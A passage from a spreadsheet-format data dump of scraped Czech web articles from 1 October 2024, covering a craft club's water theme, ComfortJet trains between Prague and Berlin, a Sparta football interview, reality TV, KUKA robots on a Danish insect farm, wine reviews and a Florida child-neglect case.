nejsou „sportovní“ rybáři, lovící pro zábavu a potěšení; oni loví vždy jen pro nutné nasycení. Oni nepoužívají vlečné sítě, udice ani speciální pasti; musí si vystačit s vlastními silami a dovednostmi. Proto loví jen tolik, kolik skutečně potřebují, na rozdíl od lidí: Hladin u můžeme rozrazit jízdou v obojživelném autě, po hladině můžeme plout lodí, či si jen tak plavat obouruč. Dnes je již vědecky prokázáno, že vlny vznikající jako brázda za lodí, mají na svědomí obrovské zrychlení eroze vodních břehů. Typickým příkladem ničivých důsledků lodních vln jsou potápějící se Benátky , jejichž radní teprve nedávno zakázali vplouvání obřích výletních lodí do kanálů města. Je otázkou, zda tento zákaz přišel ještě dost včas. Je ale jedno, zda se jedná o zaoceánskou plavbu či splouvání Lužnice, neboť totéž platí pro světová moře i pro český rybník. Pod hladinou, na mělčinách i v temných hlubinách vod se kdysi zrodil život. Do vody lze rodit i lidské děti. Jsou totiž od početí na (plodovou) vodu přirozeně zvyklé a zrození do teplé vody tak jde jim i maminkám o trochu snáz. Hladina je stále v pohybu, přestože se nám jeví klidná. Byla prvním zrcadlem pro člověčí parádnice a stále je matkou vln, které nikdy neustávají a symbolicky znázorňují pohyb, vlastně celý náš život. Neboť vlny jdou… ...oÖo... Podívejte, jak jsme téma „hladina“ zpracovaly ve svých výrobcích podle zadané barevné palety: (Foto: Pinterest) Romana aSnilek pustila po hladině lodičky ze včelího vosku, za přirozené asistence vodoměrek. Danka D.FELIX se vydala za vodou na svých cestách, ozdobená šálou a několika šňůrami dřevěných korálků Helena HelaF se pustila do neznámých a krásných vod kyanotypie, jejíž výsledky uplatnila na kapsičce. Tereza Muzikanti sobě poslala svou píseň po vlnách na nové broži. Laura Laura .K pochytala nad hladinou několik půvabných motýlků. Helena Mahel vytáhla z vln praktickou taštičku na nejrůznější potřeby. Mirka RE-NATUS spojila hladinu vnitřní a vnější a vytvořila jedinečnou krabičku s hedvábným šátkem. Tereza teruber zachytila neklidné vlnky na pevnou kabelu, do níž se vejde i nákup. Katka Katylier přistihla u vody kouzelnou duhovou vážku. Také tentokrát pocházejí všechny doprovodné fotografie z objektivů členek klubu , které na téma fotily celé léto. Bylo opravdu z čeho vybírat. Snad se vám na našich cestách s námi líbilo. My jsme si v každém případě pěkně pohrály a doufáme, že se naše tvorba líbí i vám. Děkujeme za všechny návštěvy i milé komentáře či postřehy – zde i v profilech členek. Jsme velmi rády za vaše návštěvy, děkujeme i za komentáře. Zachováte-li nám přízeň i napříště, těšíme se na shledání zase v listopadu. Téma bude úplně jiné, tak se nechte mile překvapit zadáním i naším zpracováním. ...oÖo... Pro klub 100x jinak připravila RE-NATUS – Miroslava Šmídová , dobrá trefa – Hana Konopiská; a svými výrobky i fotografiemi všechny zúčastněné členky klubu. Rubrika transition_slide Osobní zápisníky</t>
  </si>
  <si>
    <t>27890</t>
  </si>
  <si>
    <t>58890</t>
  </si>
  <si>
    <t>20241001_39_2997137771_62acfb2995e7041f5b3b.html</t>
  </si>
  <si>
    <t>62acfb2995e7041f5b3b</t>
  </si>
  <si>
    <t>První ComfortJety začaly jezdit na pravidelných spojích mezi Prahou a Berlínem</t>
  </si>
  <si>
    <t>První ComfortJety začaly jezdit na pravidelných spojích mezi Prahou a Berlínem České dráhy na vybrané vlaky spojující českou a německou metropoli nasadily do pravidelného provozu nejmodernější soupravy pro dálkovou dopravu ComfortJet. Dvě soupravy slouží cestujícím v pravidelném řazení na spojích EC 178 / 175 a EC 176 / 177 Berliner z Prahy do Berlína a zpět. Soupravy jsou v provozu v dočasném osmivozovém řazení, nové vozy jsou v soupravě doplněny o restaurační vozy klasické stavby. ComfotJety na lince Praha - Berlín „Nasazením ComfortJetů na prestižní lince Praha – Berlín symbolicky startujeme novou fázi uvádění našeho nejmodernějšího vlaku na koleje. Aktuálně máme provozně připraveny čtyři soupravy po osmi vozech, které nyní jezdí nejen do Německa , ale také už i v jednom případě na Slovensko ,“ uvedl Michal Krapinec, předseda představenstva a generální ředitel Českých drah , a pokračuje: „V uplynulém období jsme se v úzké kooperaci s výrobním konsorciem Siemens Mobility a Škoda Group zaměřili na testování a ladění všech vlakových systémů, abychom od první jízdy nabídli cestujícím maximum komfortu, které nové vozy nabízí. Věřím, že dodávky dalších ComfortJetů budou pokračovat v rychlém tempu, abychom je byli schopni našim cestujícím doručit co nejdříve.“ Prvním spojem, na kterém byla souprava ComfortJet pravidelně zařazena, byl nedělní vlak EC 178, který z pražského hlavního nádraží vyrazil na cestu v 06:28 hod. Aktuální nasazení souprav ComfortJet na vlacích linky Praha – Berlín EC 178 Berliner : Praha hl.n. (6:28) – Dresden Hbf (8:54) – Berlin Gesundbrunnen (11:02), EC 175 Berliner: Berlin Gesundbrunnen (12:44) – Dresden Hbf (15:10) – Praha hl.n. (17:24), EC 176 Berliner: Praha hl.n. (8:28) – Dresden Hbf (10:54) – Berlin Gesundbrunnen (12:53), EC 177 Berliner: Berlin Gesundbrunnen (14:44) – Dresden Hbf (17:10) – Praha hl.n. (19:24). ComfortJet ComfortJet v bodech velkoprostorový klimatizovaný interiér, tlakotěsnost celé soupravy (důležitá především při jízdách vyššími rychlostmi) chránící cestující před tlakovými rázy a tím i zaléháním v uších při průjezdu tunely nebo míjení vlakových souprav, a zároveň napomáhající vytvořit tichý a dlouhodobě čistý interiér, koncový vůz s možností čelního průchodu do posilových vozů, vnitřní bezbariérovost včetně širokých trvale otevřených mezivozových přechodů, mezi oddíly a nástupními prostory automatické posuvné dveře ovládané fotobuňkou, nástupní dveře ovládané tlačítky a systém selektivního odblokování nástupních dveří, který umožňuje centrální uzavření a zablokování dveří proti otevření ještě před rozjezdem vlaku a jejich odblokování po zastavení vlaku pouze na straně k nástupišti, ergonomická polohovatelná sedadla v 1. třídě v uspořádání 2+1 s koženým potahem a ve 2. třídě v uspořádání 2 + 2 s textilním potahem, místa jsou za sebou (letecké uspořádání) i proti sobě (vis-á-vis), sklopné stolky u míst za sebou a pevné stoly mezi sedadly v uspořádání sedel proti sobě, nadokenní police pro běžná zavazadla a stojany pro rozměrná zavazadla, individuální lampičky na čtení integrované do odkládací police na zavazadla v 1. i ve 2. třídě, bezdrátové nabíječky mobilních telefonů v 1. třídě, zásuvky 230 V a USB konektory typu A a C pro napájení přenosné elektroniky cestujících, inovativní technologie oken umožňující snazší průchod signálu mobilních telefonů do soupravy při zachování tepelně-izolačních vlastností skel, v oknech vysouvací rolety proti slunci, bezdrátová datová síť Wi-Fi pro internetové připojení, zábavní a informační palubní portál, elektronický audiovizuální informační systém s LCD monitory a elektronický rezervační systém, bezbariérové řešení pro cestování osob na vozíku zahrnující 3 místa pro vozíky, bezbariérové WC, elektrické zdvihací plošiny pro nástup / výstup osob na vozíku a zásuvky pro dobíjení akumulátorových baterií elektrických vozíků, cestující na vozíku mají k dispozici sklopné stoly, pro nevidomé a slabozraké osoby je vlak vybaven tlačítky v haptickém provedení a nápisy v Braillově písmu a navíc dálkovým ovládáním nástupních dveří přes slepeckou vysílačku, dětské kino, dětská stolní hra na vyhrazených místech pro cestující s dětmi, sklopný pult pro přebalování kojenců, místa vyhrazená pro uložení kočárků, místa pro uložení 12 jízdních kol (včetně zásuvek po nabíjení elektrických kol) a objemných zavazadel, na jednom konci je jednotka vybavena tradičním UIC rozhraním, které umožňuje připojení a průchod do dalších vozů klasické stavby, schválení pro provoz v České republice i okolních evropských státech ( Německo , Polsko , Rakousko , Slovensko , Maďarsko a Dánsko ), protipožární systém a systém překlenutí účinku záchranné brzdy umožňující provoz ve velmi dlouhých tunelech, např. Koralmský (32,9 km), Semmeringský úpatní (27,3 km) nebo podmořský Fehmarnský (17,6 km), možnost provozu na vysokorychlostních tratích, V konečném uspořádání: čelní řídicí vůz 1. třídy, vložený vůz 1. třídy, vložený vůz s restauračním oddílem a oddílem 2. třídy, vložený víceúčelový vůz 2. třídy (dětské kino, místa pro osoby na vozíku apod.), 4 vložené vozy 2. třídy, koncový vůz 2. třídy (oddíl pro přepravu jízdních kol), 99 sedadel v 1. vozové třídě, 456 sedadel ve 2. vozové třídě, restaurační oddíl s 18 místy k sezení a možností zakoupení teplých nebo studených pokrmů i dalšího občerstvení během cesty, s moderní kuchyní s technologií zchlazené stravy a vícemodálním konvektomatem pro její ohřev, kávovarem, výčepem piva a myčkou pro ekologické opakovatelné používání nádobí. Zdroj: České dráhy Související Autor: Jana Bečková Autor person Jana Bečková Rubrika transition_slide DOPRAVA</t>
  </si>
  <si>
    <t>1920</t>
  </si>
  <si>
    <t>1050</t>
  </si>
  <si>
    <t>20241001_4_2999515934_86c3e330f2e03f94662b.html</t>
  </si>
  <si>
    <t>86c3e330f2e03f94662b</t>
  </si>
  <si>
    <t>Tohle je Sparta! Trenéra Letenských nadchla remíza v Německu</t>
  </si>
  <si>
    <t>Tohle je Sparta ! Trenéra Letenských nadchla remíza v Německu Publikováno Stuttgart (od našeho zpravodaje) – Friisovi svěřenci ve dvou úvodních zápasech milionářské soutěže zapsali čtyři body. „A to jsme pár týdnů zpět slavili postup, který byl obrovským úspěchem pro celý klub,“ radoval se dánský trenér. Takže s postavením v tabulce panuje spokojenost? Nemohli jsme si přát nic lepšího. Hráli jsme proti top týmu Německa i celé Evropy . Kluky musím pochválit. Všichni dřeli, jsem opravdu šťastný. Ceníte si reakce mužstva na inkasovaný gól? Nezaleklo se, chtělo hrát… Tohle je mentalita Sparty . V kabině hodně řešíme, že branka vaši psychiku vždycky ovlivní. Vstřelená i inkasovaná. Chystali jsme se na to, abychom i v případě obdrženého gólu zůstali klidní a zaměřili se na náš výkon. Pochod fanoušků Sparty na zápas Ligy mistrů ve Stuttgartu Video: Sport.cz Prodali jste evropské zkušenosti, nabyté z minulé sezony? Určitě. Dvojzápas s Liverpoolem pro nás byl velká škola, poučili jsme se z něj. Nejen v pohárech jsme schopni otáčet i zápasy i ve chvílích, kdy to vypadá, že jsme dole. V základu nastoupil na hrotu Albion Rrahmani místo Victora Olatunjiho. Proč jste udělal tohle rozhodnutí? Albion má dobrý první dotyk, je silný v mezihře. Chtěli jsme mít možnost víc držet míč. Navíc byl i čerstvější než Victor. Stuttgart jako reparát? Raději výhru v derby, říká Jaroslav Zelený Video: Sport.cz I tak se ale Olatunji na hřiště dostal a občas jste směrem k němu divoce gestikuloval. Měl jste k jeho výkonu výhrady? Victor je mašina, neustále létá nahoru a dolů, což stojí hodně energie. Pak občas někde chybí, proto na něj křičím. Ale to je u mě normální. Problém by byl, kdybych křičet přestal. Pak by bylo namístě se ptát, jestli se něco neděje. Pozor Aktualita: Djokovič ani zdaleka nekončí, chtěl by hrát i na příští olympiádě Ze sektoru hostí vás hnalo vpřed přesně 3333 sparťanů. Co jste říkal na ně? Být v Německu a takhle je slyšet, to je neuvěřitelné. Moc nám pomohli. Teď doufám, že si naplno užijí Oktoberfest , který probíhá ve městě. Nechme pivo stranou. Nachystal vás obtížný zápas ideálně na nedělní derby se Slavií ? Možná. Určitě nám to pomohlo napravit předchozí prohru s Olomoucí . Tam jsme náš standard neodvedli, zbytečně chybovali. Po tomto utkání nemůže být o chybách řeč. Hráli jsme fakt dobře, musíme si ten pocit užít. Pak už se budeme chystat na neděli. Celý článek zde: ZDROJ ZDE ….✅ REKLAMU ✅ můžete mít zde například formou zpětného odkazu více: Ceny reklamy …. Doporučujeme: Autor: Rudolf Plíhal Autor person Rudolf Plíhal</t>
  </si>
  <si>
    <t>77</t>
  </si>
  <si>
    <t>20241001_40_2997050916_7a2d8e23a3df05e10b09.html</t>
  </si>
  <si>
    <t>7a2d8e23a3df05e10b09</t>
  </si>
  <si>
    <t>Patnáct až dvacet piv denně. Martin z Výměny manželek utratí měsíčně za alkohol šílenou částku</t>
  </si>
  <si>
    <t>Patnáct až dvacet piv denně. Martin z Výměny manželek utratí měsíčně za alkohol šílenou částku Středeční Výměna manželek se bude točit kolem zvířat a alkoholu . V rodině skladníka Martina a jeho ženy Lucie je hodně zvířat a alkohol teče proudem. Za pivo a za slivovici utratí jen za sebe bodrý vesničan 12 tisíc korun. Nejnovější epizodu reality show okomentovala pro ŽivotvČesku.cz kreativní producentka a režisérka Jana Rezková. V nejnovější epizodě Výměny manželek pojede padesátiletá Lucie do Kladna , kde už na první pohled nebude spokojená s tím, že deset dní stráví v paneláku – dle jejích slov v »králíkárně«. Její nespokojenost pokračuje, co se týká fungování, i v nové domácnosti. Lucie, jež má doma několik desítek zvířat, lituje dva psy, kteří jsou zavření v předsíni a nemají žádný prostor. Druhá maminka Petra jede do obce Rokytovec do domku se zahradou. Při první prohlídce domu zůstane nejvíce zaskočená z popelníků, které rodina má vedle postele na nočním stolku. Poté ji šokuje počet zvířat, která rodina chová. Jednatřicetiletou Petru také zaskočí, že se v náhradní rodině ve velkém konzumuje alkohol . Náhradní manžel Martin se pyšně pochlubí tím, kolik měsíčně za pivo a slivovici utratí. "Když je to jen pro mě, tak plus minus dvanáct měsíčně," šokoval na kameru skladník, který denně vypije 15 až 20 piv . Výměnu manželek, kdy na jedné straně žije mladá rodina »líný« panelákový život a na druhé straně žijí zcela odlišným způsobem, okomentovala režisérka projektu Jana Rezková. "Všichni byli fajn, zajímavostí určitě byla nadměrná konzumace alkoholu v rodině, kde pivo a panák byl na denním pořádku," konstatovala pro ŽivotvČesku.cz Jana Rezková. Diskutujme slušně. Pravidla diskuze na portálu ŽivotvČesku.cz. Autor: Alena Šindelářová Autor person Alena Šindelářová</t>
  </si>
  <si>
    <t>155440</t>
  </si>
  <si>
    <t>109470</t>
  </si>
  <si>
    <t>20241001_41_2997204853_2180c7baee7d03f93a70.html</t>
  </si>
  <si>
    <t>2180c7baee7d03f93a70</t>
  </si>
  <si>
    <t>O chov larev se na hmyzí farmě starají roboty KUKA</t>
  </si>
  <si>
    <t>O chov larev se na hmyzí farmě starají roboty KUKA Rubrika: průmyslové a servisní roboty Šest robotů KR Quantec společnosti KUKA pracuje na největší a první komerční hmyzí farmě v Dánsku . Firma Enorm Biofactory zde chová larvy much Hermetia illucens, z nichž vyrábí bílkovinná krmiva pro ryby, drůbež a domácí zvířata a také hmyzí olej, který lze rovněž používat jako potravinový doplněk pro různá zvířata. Cílem je využití hmyzu jako zdroje bílkovin, který je šetrný ke klimatu. V tovární budově nedaleko městečka Flemming, 50 km od Aarhusu v Dánsku , se denně po dobu téměř 24 hodin naskýtá zajímavá podívaná. Miliony muších larev se tu v obrovském množství boxů prokousávají potravou, přičemž nádoby se ne ustále pohybují, vyprazdňují a naplňují – a právě to mají na starost roboty KUKA. Larvy mouchy bráněnky (Hermetia illucens) se živí téměř veškerou organickou hmotou. Je tedy možné je krmit odpadem z potravinářské výroby, který by bylo nutné zlikvidovat jiným způsobem. Sušené larvy bráněnky znají jako krmivo chovatelé ryb, plazů nebo drůbeže. Enorm Biofactory z nich vyrábí hmyzí moučku nebo olej. Hmyzí moučka je cenným zdrojem živočišných bílkovin a je vhodnou dobře stravitelnou náhradou jiných bílkovinných krmiv. Díky přibližně 55% obsahu bílkovin lze hmyzí moučku účinně přidávat jako složku do krmiv pro různá zvířata, včetně ryb, drůbeže, prasat a některých domácích zvířat. Hmyzí olej je nasycený tuk, který se vyznačuje vysokým obsahem kyseliny laurové, sloučeniny s prokázanými imunostimulačními vlastnostmi. Tento olej může být využíván jako výživový doplněk v krmivech pro různé skupiny zvířat. Výroba bílkovin z hmyzu je vynikajícím příkladem trvale udržitelného oběhového hospodářství s minimálním negativním dopadem na životní prostředí a klima. Rybí nebo sójová moučka, které se jinak do krmiv přidávají, totiž bez vlivu na životní prostředí nejsou. Stejně tak není ekologické získávání kyseliny laurové z palmového nebo kokosového oleje. Roboty naplní každých sedm sekund jeden box Nádoby používané k chovu larev jsou velice těžké a je třeba je rychle plnit, vyprazdňovat a stohovat. Najít ideální řešení pro tento provoz bylo úkolem Rolfa Tangeho a jeho týmu. Tange je technický ředitel skupiny Sealing System, která používá roboty KUKA pro své zákazníky už několik desetiletí. „Věděli jsme, že pro hmyzí farmu Enorm budou nejlepší flexibilní roboty KUKA v hygienickém provedení,“ říká Tange. V první fázi žijí larvy ve 30- až 40cm boxech. Po sedmi dnech jsou přemístěny do nových boxů o rozměru větším než 1 m2 . A přinejmenším zde jsou roboty nepostradatelným pomocníkem člověka: v každém boxu je 50 kg potravy a na ni se vysype 70 000 larev. Šest robotů KUKA plní po dobu 20 h denně každých 7 s jeden box, tj. 500 boxů za hodinu. Během zbývajících čtyř hodin se systém čistí. Kapacita výroby je 100 tun larev denně. Simulace robotického systému Tým Sealing System otestoval důležité procesy předem virtuálně s využitím softwaru od firmy Visual Components. Tato finská společnost, která je od roku 2017 součástí skupiny KUKA, se zaměřuje na softwarová řešení pro 3D simulace v plánování provozu. Software od Visual Components byl použit k simulaci rychlosti a taktu, v němž se roboty a dopravníkové pásy musí pohybovat. Výhled do budoucna Vzhledem ke změně klimatu a rostoucí světové populaci nebyla udržitelná produkce potravin nikdy tak důležitá jako nyní. Pro zmírnění zátěže, kterou produkce potravin představuje pro přírodní zdroje, mohou sehrát klíčovou roli larvy černé mušky bráněnky. Brzy možná budou továrny podobné té ve Flemmingu všude, aby zpracovávaly lokální odpad z potravinářské výroby. Ostatně mnoho odborníků je přesvědčeno o tom, že ingredience, jejichž základem jsou larvy much bráněnek, lze vyrábět zodpovědně a že mají výrazně nižší uhlíkovou stopu než jiné zdroje živočišných bílkovin. KR QUANTEC PA HO Paletizační robot KR Quantec PA HO s nosnosti 140 až 240 kg a dosahem 3 200 mm používá ve všech osách i kabelových rozvodech speciální mazivo s certifikací NSF H1. Robot splňuje všechny požadavky na automatizaci v potravinářském průmyslu: má minimální požadavky na prostor, krátké cykly a nízké provozní náklady. K dispozici je velké množství variant. Stohuje pytle mouky, plechovky, basy s pivem nebo lahve s vodou – a je také skutečným přínosem, pokud jde o paletizaci ovoce a zeleniny. KR Quantec PA HO pracuje s maximální přesností i v extrémních podmínkách: v provedení Arctic odolává provozní teplotě až –30 °C, může být tedy použit i v mrazírnách. Obr. 1. Dospělá bráněnka Hermetia illucens Obr. 2. Boxy s larvami bráněnek Obr. 3. Robot KR Quantec PA HO v provedení pro potravinářskou výrobu Autor: (Text a foto: KUKA AG) Rubrika transition_slide průmyslové a servisní roboty</t>
  </si>
  <si>
    <t>2000</t>
  </si>
  <si>
    <t>20241001_42_2997033785_e2eaeb08155a792ff2d3.html</t>
  </si>
  <si>
    <t>e2eaeb08155a792ff2d3</t>
  </si>
  <si>
    <t>Jak si praví muži oblíbili avokádo a začali jíst život zdravěji</t>
  </si>
  <si>
    <t>Jak si praví muži oblíbili avokádo a začali jíst život zdravěji autor: Redakce Nezdrave.cz | 01.10.2024 | Jídlo Avokádo – zelený plod, který se stal symbolem zdravého stravování, hipsterského stylu a možná i lehkého narcismu. Muži, kteří dříve považovali jídelníček za soubor steaků a piva , najednou objevili kouzlo tohoto krémového ovocného oblíbence. Ačkoliv byste si mohli myslet, že je to pokrm pouze pro módu smýšlející yuppies, pravdou je, že avokádo si našlo cestu do srdcí a talířů širokého spektra mužů, kteří si snaží užívat života naplno. Vstupte do světa, kde se zdravé jídlo v kombinaci s špetkou humoru stává základem skvělého životního stylu. Avokádo jako symbol moderního muže Tento zelený skvost se stal ve městech symbolem moderního muže, který se nebojí výzev v kuchyni. Avokádo se pouští do kombinací, které dělají přeborníky z náhodných kuchařů; guacamole, smoothie bowl nebo avokádový toast na raňajky s kousky rajčat a zakysanou smetanou, tomu se říká umění! A když k tomu přidáte pohár kvalitního craft piva nebo skvělého vína , máte recept na dokonalou večeři. Zajímavý fakt? Avokádo obsahuje více draslíku než banán, takže i když v posledních letech banány vypadly z módy, avokádo si nadále se svojí konzistencí a výživovými hodnotami udržuje zvučné jméno. Muži, kteří přišli na to, že i zdravé jídlo může být sexy, nyní okupují víc než jen fitness centra. Tradičně masově orientovaní borci objevují výhody stravy bohaté na zdravé tuky. S každým soustem avokáda vstřebávají novou filozofii „měj se rád a vykašli se na to, co ostatní říkají“. Stávají se z nich experimentátoři kulinářského světa, kteří s radostí testují nové recepty a nebrání se prozkoumávat neznámé potraviny. Někdo to může považovat za přehnané, ale každý chlap, který se vyhýbá hranolkům každý pátek, jistě ocení své snažení. Zdraví, chuť a dobíhající trendy Jak čas plyne a trendy se mění, avokádo na talíři zůstává. Módní kulinářské vlny se neustále mění a přicházejí a odcházejí, ale avokádo tu zůstává jako stabilní ukazatel zdravého, přitom lákavého stravování. Nezapomeňte, že avokádo je víc než jen zelená hmota – je to symbol transformace, přijetí zdravého životního stylu a umění se postavit čelem výzvám. Je prostě rozkošné – nejen v chuti, ale i tím, jak se v průběhu let vyvinulo. Zároveň si muži uvědomují, že jídlo není pouze uspokojení hladu. Je to sociální událost, příležitost k setkání, a také k popovídání s přáteli o prkotinách. Kluci se tisknou kolem stolu, ochutnávají experimenty s avokádovými pochoutkami, a i když občas vypadávají z kůže, smích a dobrá nálada zaplavují místnost. Takže pokud si chcete užít společné chvíle, vyhněte se nudné pizze a vezměte si na pomoc avokádo – ať už jako guacamole nebo v jinoucích úpravách, tohle ovocné božstvo má schopnost zvednout náladu každému. Dnešní muži chápou, že život je příliš krátký na to, aby se omezovali na předsudky o jídle. Avokádo se stalo jejich spojencem, a místo aby se snažili naplnit kýčovité stereotype, raději se postaví vedle moderních trendů. Avokádo je nejen jídlo, je to životní styl pro kluky, kteří se nebojí být v kuchyni kreativní a přitom chtějí nezapomenout na radosti života. S každým kouskem tedy podpořte ten den, kdy honíte skvělou chuť, zdraví a smích, jaký by si přál každý raketový muž dnešní doby. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241001_43_2997035319_33f5e4afaa22dc481ada.html</t>
  </si>
  <si>
    <t>33f5e4afaa22dc481ada</t>
  </si>
  <si>
    <t>Víno Sauvignon 2021, voc, Vinařství Líbal</t>
  </si>
  <si>
    <t>Víno Sauvignon 2021, voc, Vinařství Líbal „16.6.023: 88, ochutnán znovu v září, zvyšující se kondice vína mě až zaskočila k 18.9.023: Intenzivnější,odrůdová a koncentrovaná vůně. Nabízí širokou paletu, jako první se objeví marakujová šťáva s prvkem kořenitosti, posléze listy černého rybízu a bylinný podtón. Chuť je křupavě šťavnatá, nabízí více pater. Obecně lze charakterizovat jako zelený styl s angreštem a broskvovou šťávou, doplněnou opět o zmíněnou mučenku, žádná část však není dominantní, to vše zakončeno vyšší kyselinou, která oněch 12g cukru dosti pocitově sráží onen vjem cukru. Víno zaujme velkou část publika, je šťavnaté, voňavé, s lehkým cukrem. Ze Sg v salonu mě zaujalo až při druhé návštěvě a onen extrakt mělo z nich nejvyšší a možná právě díky němu je nyní o krok před ostatními. Ačkoliv je víno ,,jen¨na nerezu, je skvěle vybalancované, pitelné a s mnoha vjemy, proto i přes onen nerez dávám 90. přechutnáno z ryzlinkové sklenky Květná“ (0) /100 24. 7. 2023 Výborné víno : Špičkově provedené odrůdové víno . Čisté s delší dochutí. Často nejlepší v poměru kvality a ceny. (0) Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241001_44_2997033788_8319552c4080eca36e9b.html</t>
  </si>
  <si>
    <t>8319552c4080eca36e9b</t>
  </si>
  <si>
    <t>Víno Cuvée Svatovavřinecké a Alibernet 2019, pozdní sběr, Martin Strýček</t>
  </si>
  <si>
    <t>Víno Cuvée Svatovavřinecké a Alibernet 2019, pozdní sběr, Martin Strýček /100 28. 1. 2024 „ Víno sytě granátové barvy s úzkým světlejším meniskem, fialovými odlesky a velmi dobrou viskozitou. Bohatá, čistá, výrazná, zralá a plná, příjemně kořenitá ovocná chuť s lehkou stopou ušlechtilého dřeva, s aromatickým kořením a ovocnými tóny, evokujícími černý rybíz a borůvky, s jemným podtónem zralých peckovin. Výrazná, plná, oblá a hladká chuť s tóny černého bobulového ovoce a zralých švestek, později i jemně višní, s nádechem koření a sladkého dřeva, jemnou kyselinkou a sametovými taniny. Dlouhý závěr s nádechem kvalitní kávy a hořké čokolády. Velmi příjemné pití.“ /100 7. 6. 2024 „ Víno odpovídá stylu: macerace na slupkách, spontánní kvašení, vinifikace v kvalitních nepálených sudech, ležení na kvasnicích. Sud udává tón projevu. Vysoká viskozita, krásná padparadscha barva. Vůně sušeného ovoce, bylinek a sudu, hřejivá taninová chuť s živou kyselinkou a prvky sušeného ovoce a minerality. Plné, s dlouhou dochutí. Hrozny z bio vinice. Skvělé, v rámci stylu dokonale zvládnuté, vysoce kvalitní víno . Myslel jsem si, že půjde o nejapný pokud o naturální víno , ale opak je pravdou - mistrně zvládnutá technologie. Není to ale víno pro každého. O svých oranžových vínech Spielberg uvádí: Speciální, limitovaná řada vín. Jedná se o vína vyrobená čistě přírodní cestou z hroznů vinic udržovaných v bio režimu ochrany a v přísně ekologicky čistém prostředí. Vína spontánně kvašená, s minimem síry a odrážející terroir. Na etiketě je vyobrazena TIBICINA HAMEATODES = cikáda viniční, jejíž výskyt na našich vinicích je vzácným ukazatelem čistoty a neporušenosti přírody s mimořádně příznivými teplotními poměry.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241001_45_2997331718_b1f2648650650a74c494.html</t>
  </si>
  <si>
    <t>b1f2648650650a74c494</t>
  </si>
  <si>
    <t>Jedna rodina: Darja musela učinit rázné opatření. Všichni zůstali jako opaření</t>
  </si>
  <si>
    <t>Jedna rodina: Darja musela učinit rázné opatření. Všichni zůstali jako opaření Publikováno: 1. října 2024, 20:05 Pamatujte, že každý komentář bývá zprávou o komentujícím. Děkujeme za vaše komentáře. Komentáře Těžké časy zažívají i ve Vodárně. Nový majitel neumí ani narazit sud s pivem a hosté se bouří. Ani nový hospodský se neosvědčil a Kolibřík situaci vyřešil tak, že z výčepu udělal samoobsluhu. Nic totiž nestíhá. Nechápe, jak to Filip a Vágy všechno zvládali. Nervy má i z provozu sauny. Poté, co měla Olga pozitivní test na alkohol , šla Darja novinku oznámit řediteli. Nečekala však takovou reakci. Olga musí dostat padáka! Není to první problém, který s ní je, a alkohol na pracovišti je podle něj vrchol. Klidně mohla do průšvihu dostat celou kliniku. Při práci, kterou dělala, je třeba maximální soustředění a preciznost. Ani námitky, že je Olga ve své profesi skvělá, ředitele neobměkčily. Darja předpokládala, že postačí nějaký finanční postih, a i ona byla z vyhazovu nesvá. Ale poslední slovo má ředitel. Novinku oznámila všem veřejně, aby se zabránilo spekulacím. Nikdo tomu nechtěl uvěřit a Olga byla doslova v šoku. Mrak si ještě za Darjou zašel, aby jí řekl, co si o tom myslí, ale Darja si stála za svým. Ona by Olgu nevyhodila, ale musela. Ve Vodárně je jedna změna za druhou Vodárna je v totálním chaosu a všichni volají po návratu původního personálu. Filip a Vágy sice předstírají, že je jim doma dobře a najít si jinou práci nebude problém, ale i jim se stýská a chybí jim každodenní dril. Bob jim radí, aby oprášili živnost a šli znovu dělat výškové práce, ale to už se jim moc nechce. A nadšená by z toho nebyla ani Norika . Zatím si ani jeden nechce přiznat, že se vrátit chce. Tato iniciativa by musela především vzejít od Kolibříka. Tomu nevydrží nervy v okamžiku, kdy najde v sauně Olgu v bezvědomí. Ta po stresujícím rozhovoru s Vildou hledala způsob, jak „vypnout“, ale asi neměla úplně v plánu bezvědomí a následný pobyt v nemocnici, kam ji doprovodil v sanitce Vilda. Související článek Jedna rodina: Olga propadla beznaději a alkoholu a Vodárna se otřásá v základech Petra s Filipem před časem prošli rodičovskou zkouškou trpělivosti, když se hledala Martina. Nakonec vše dobře dopadlo a doufali, že už další boj s… A následně se ve Vodárně stočí rozhovor k návratu Filipa a Vágyho, kteří se tam náhodně i s Kolibříkem potkali. Vypadá to, že vše je alespoň tady na dobré cestě. Horší to má Olga. Než šla do sauny, byla na procházce u řeky s Vildou. Trochu doufala, když ji žádal o setkání, že se třeba uklidnil a dá jí druhou šanci. Jenže žádný velký návrat Vilda neplánuje. Je mu to líto, rád jí pomůže se vším, co bude potřebovat, ale už jí nemůže věřit a bojí se, že by za čas mohla mít další zkrat a situace by se mohla opakovat. Autor: Lída Kropáčková Autor person Lída Kropáčková</t>
  </si>
  <si>
    <t>60910</t>
  </si>
  <si>
    <t>66670</t>
  </si>
  <si>
    <t>20241001_46_2996496406_606c286f0c216d0f5c2c.html</t>
  </si>
  <si>
    <t>606c286f0c216d0f5c2c</t>
  </si>
  <si>
    <t>Jakou cenu má dětský život? Pro některé rodiče zřejmě jen šest piv!</t>
  </si>
  <si>
    <t>Jakou cenu má dětský život? Pro některé rodiče zřejmě jen šest piv ! K neobvyklému případu došlo na americké Floridě . Mladý pár rodičů se tam pokusil prodat svého teprve dvouměsíčního syna. Dokonce se jim i podařilo najít kupce, se kterým začali uzavírat zvrácenou smlouvu! Jednadvacetiletý Darien Urban a dvacetiletá Shalene Ehlersová zřejmě nevyhrají titul Rodiče roku. Svého teprve dvouměsíčního synáčka se totiž pokusili zbavit pro vlastní zisk. O kuriózním případu informoval deník Daily Star. Podle informací svědka, který na pár zavolal policii, se synka pokusili nejdříve prodat za v přepočtu dvacet dva tisíc korun. K transakci si prý i připravili smlouvu. „My, Darien Urban a Shalene Ehlersová, přepisujeme veškerá práva na výchovu našeho chlapečka Codymu Nathanielovi Martinovi za tisíc dolarů. Upozornění: Po podepsání smlouvy si už rodiče nemohou své rozhodnutí rozmyslet,“ stálo v ní. Z transakce však nakonec naštěstí sešlo. Objevil se však další zájemce, známý jako Ricky Crawford. Ten páru nabídl, že si dítě nechá u sebe přes noc výměnou za šest plechovek piva . „Urban a Ehlersová souhlasili a dítě mu předali spolu s taškou plen,“ uvedla policie. Oba rodiče čelí obviněním ze zanedbávání dětí. „Podle výsledků dosavadního vyšetřováni jsme přesvědčeni, že oba rodiče vystavili svého potomka obrovskému riziku úmrtí, když ho nechali v péči očividně podnapilého člověka, kterého ani neznali,“ stojí ve vyjádření policie. 